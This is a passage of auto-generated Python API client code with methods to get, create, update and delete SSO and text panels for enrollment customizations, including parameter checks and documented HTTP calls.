# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_sso_panel_id_get`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_sso_panel_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "GetEnrollmentCustomizationPanelSsoAuth",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/sso/{panel-id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_sso_panel_id_put(self, id, panel_id, enrollment_customization_panel_sso_auth, **kwargs): # noqa: E501
"""Update a single SSO Panel for a single Enrollment Customization # noqa: E501
Update a single SSO panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_sso_panel_id_put(id, panel_id, enrollment_customization_panel_sso_auth, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param enrollment_customization_panel_sso_auth: Enrollment Customization Panel to update (required)
:type enrollment_customization_panel_sso_auth: EnrollmentCustomizationPanelSsoAuth
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelSsoAuth
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_sso_panel_id_put_with_http_info(id, panel_id, enrollment_customization_panel_sso_auth, **kwargs) # noqa: E501
def v1_enrollment_customization_id_sso_panel_id_put_with_http_info(self, id, panel_id, enrollment_customization_panel_sso_auth, **kwargs): # noqa: E501
"""Update a single SSO Panel for a single Enrollment Customization # noqa: E501
Update a single SSO panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_sso_panel_id_put_with_http_info(id, panel_id, enrollment_customization_panel_sso_auth, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param enrollment_customization_panel_sso_auth: Enrollment Customization Panel to update (required)
:type enrollment_customization_panel_sso_auth: EnrollmentCustomizationPanelSsoAuth
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelSsoAuth, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'panel_id',
'enrollment_customization_panel_sso_auth'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_sso_panel_id_put" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_sso_panel_id_put`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_sso_panel_id_put`") # noqa: E501
# verify the required parameter 'enrollment_customization_panel_sso_auth' is set
if self.api_client.client_side_validation and ('enrollment_customization_panel_sso_auth' not in local_var_params or # noqa: E501
local_var_params['enrollment_customization_panel_sso_auth'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `enrollment_customization_panel_sso_auth` when calling `v1_enrollment_customization_id_sso_panel_id_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'enrollment_customization_panel_sso_auth' in local_var_params:
body_params = local_var_params['enrollment_customization_panel_sso_auth']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "GetEnrollmentCustomizationPanelSsoAuth",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/sso/{panel-id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_sso_post(self, id, enrollment_customization_panel_sso_auth, **kwargs): # noqa: E501
"""Create an SSO Panel for a single Enrollment Customization # noqa: E501
Create an SSO panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_sso_post(id, enrollment_customization_panel_sso_auth, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param enrollment_customization_panel_sso_auth: Enrollment Customization Panel to create (required)
:type enrollment_customization_panel_sso_auth: EnrollmentCustomizationPanelSsoAuth
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelSsoAuth
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_sso_post_with_http_info(id, enrollment_customization_panel_sso_auth, **kwargs) # noqa: E501
def v1_enrollment_customization_id_sso_post_with_http_info(self, id, enrollment_customization_panel_sso_auth, **kwargs): # noqa: E501
"""Create an SSO Panel for a single Enrollment Customization # noqa: E501
Create an SSO panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_sso_post_with_http_info(id, enrollment_customization_panel_sso_auth, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param enrollment_customization_panel_sso_auth: Enrollment Customization Panel to create (required)
:type enrollment_customization_panel_sso_auth: EnrollmentCustomizationPanelSsoAuth
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelSsoAuth, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'enrollment_customization_panel_sso_auth'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_sso_post" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_sso_post`") # noqa: E501
# verify the required parameter 'enrollment_customization_panel_sso_auth' is set
if self.api_client.client_side_validation and ('enrollment_customization_panel_sso_auth' not in local_var_params or # noqa: E501
local_var_params['enrollment_customization_panel_sso_auth'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `enrollment_customization_panel_sso_auth` when calling `v1_enrollment_customization_id_sso_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'enrollment_customization_panel_sso_auth' in local_var_params:
body_params = local_var_params['enrollment_customization_panel_sso_auth']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
201: "GetEnrollmentCustomizationPanelSsoAuth",
400: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/sso', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_text_panel_id_delete(self, id, panel_id, **kwargs): # noqa: E501
"""Delete a Text single Panel from an Enrollment Customization # noqa: E501
Delete a Text single panel from an Enrollment Customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_panel_id_delete(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_text_panel_id_delete_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_text_panel_id_delete_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Delete a Text single Panel from an Enrollment Customization # noqa: E501
Delete a Text single panel from an Enrollment Customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_panel_id_delete_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_text_panel_id_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_text_panel_id_delete`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_text_panel_id_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/text/{panel-id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_text_panel_id_get(self, id, panel_id, **kwargs): # noqa: E501
"""Get a single Text Panel for a single Enrollment Customization # noqa: E501
Get a single Text panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_panel_id_get(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelText
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_text_panel_id_get_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_text_panel_id_get_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Get a single Text Panel for a single Enrollment Customization # noqa: E501
Get a single Text panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_panel_id_get_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelText, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_text_panel_id_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_text_panel_id_get`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_text_panel_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "GetEnrollmentCustomizationPanelText",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/text/{panel-id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_text_panel_id_markdown_get(self, id, panel_id, **kwargs): # noqa: E501
"""Get the markdown output of a single Text Panel for a single Enrollment # noqa: E501
Get the markdown output of a single Text panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_panel_id_markdown_get(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: Markdown
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_text_panel_id_markdown_get_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_text_panel_id_markdown_get_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Get the markdown output of a single Text Panel for a single Enrollment # noqa: E501
Get the markdown output of a single Text panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_panel_id_markdown_get_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(Markdown, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_text_panel_id_markdown_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_text_panel_id_markdown_get`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_text_panel_id_markdown_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "Markdown",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/text/{panel-id}/markdown', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_text_panel_id_put(self, id, panel_id, enrollment_customization_panel_text, **kwargs): # noqa: E501
"""Update a single Text Panel for a single Enrollment Customization # noqa: E501
Update a single Text panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_panel_id_put(id, panel_id, enrollment_customization_panel_text, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param enrollment_customization_panel_text: Enrollment Customization Panel to update (required)
:type enrollment_customization_panel_text: EnrollmentCustomizationPanelText
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelText
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_text_panel_id_put_with_http_info(id, panel_id, enrollment_customization_panel_text, **kwargs) # noqa: E501
def v1_enrollment_customization_id_text_panel_id_put_with_http_info(self, id, panel_id, enrollment_customization_panel_text, **kwargs): # noqa: E501
"""Update a single Text Panel for a single Enrollment Customization # noqa: E501
Update a single Text panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_panel_id_put_with_http_info(id, panel_id, enrollment_customization_panel_text, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param enrollment_customization_panel_text: Enrollment Customization Panel to update (required)
:type enrollment_customization_panel_text: EnrollmentCustomizationPanelText
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelText, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'panel_id',
'enrollment_customization_panel_text'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_text_panel_id_put" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_text_panel_id_put`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_text_panel_id_put`") # noqa: E501
# verify the required parameter 'enrollment_customization_panel_text' is set
if self.api_client.client_side_validation and ('enrollment_customization_panel_text' not in local_var_params or # noqa: E501
local_var_params['enrollment_customization_panel_text'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `enrollment_customization_panel_text` when calling `v1_enrollment_customization_id_text_panel_id_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'enrollment_customization_panel_text' in local_var_params:
body_params = local_var_params['enrollment_customization_panel_text']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "GetEnrollmentCustomizationPanelText",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/text/{panel-id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_text_post(self, id, enrollment_customization_panel_text, **kwargs): # noqa: E501
"""Create a Text Panel for a single Enrollment Customization # noqa: E501
Create a Text panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_text_post(id, enrollment_customization_panel_text, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param enrollment_customization_panel_text: Enrollment Customization Panel to create (required)
:type enrollment_customization_panel_text: EnrollmentCustomizationPanelText
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
